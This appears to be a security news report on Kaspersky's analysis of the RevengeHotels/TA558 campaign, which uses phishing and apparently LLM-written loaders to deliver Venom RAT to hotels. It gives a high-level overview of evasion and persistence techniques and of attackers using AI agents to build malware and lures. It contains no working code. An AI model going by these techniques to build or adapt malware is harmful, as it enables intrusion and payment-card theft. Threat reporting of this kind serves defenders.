The threat actor TA558 has been attributed to a new wave of attacks delivering remote access trojans, including Venom RAT, to hotels in Brazil and Spanish-speaking markets, researchers say. The activity is tracked by Kaspersky as part of a cluster named RevengeHotels, which has a history of targeting hospitality and travel organizations in Latin America.
Kaspersky noted that the latest campaigns, observed in the summer of 2025, rely on phishing emails with invoice-themed content to drop Venom RAT implants via JavaScript loaders and PowerShell downloaders. A significant portion of the initial infector and downloader code appears to be generated by large language model (LLM) agents, the security firm said.
The Venom RAT chain starts with a heavily commented script that the firm says resembles output from an LLM, with the primary function to load subsequent scripts that facilitate infection. A PowerShell payload retrieves a downloader named cargajecerrr.txt from an external server and executes it, after which two additional payloads are fetched: a loader responsible for launching Venom RAT and the RAT itself. Venom RAT is a commercial tool reportedly priced at about $650 for a lifetime license, with bundled options that include HVNC and Stealer components.
Security researchers describe Venom RAT as capable of data exfiltration, acting as a reverse proxy, and incorporating anti-kill protections to ensure persistence. Among its techniques, the malware modifies the Discretionary Access Control List (DACL) of the running process, terminates security-related processes, and establishes persistence via Windows Registry modifications. When run with elevated privileges, it can also enable SeDebugPrivilege, mark itself as a critical system process, keep the display awake, and prevent sleep. The campaign also references propagation through removable USB drives and attempts to disable Defender Antivirus and tamper with the task scheduler and Registry to maintain access.
Kaspersky notes that RevengeHotels has broadened its capabilities, leveraging LLM agents to generate and adjust phishing lures and expand its reach into new regions. The attackers’ objective remains the same: to harvest guest credit card data from hotel systems and online travel agencies (OTAs) such as Booking.com, according to the Unit 42 analysis cited by researchers.
In its assessment, Kaspersky also pointed to a pattern of Portuguese- and Spanish-language lures tied to hotel reservations and job applications, crafted to increase the likelihood that recipients will click on malicious links and trigger the infection chain. The security firm emphasizes that RevengeHotels’ use of AI-generated components marks a notable shift toward more scalable, adaptable phishing campaigns against the hospitality sector.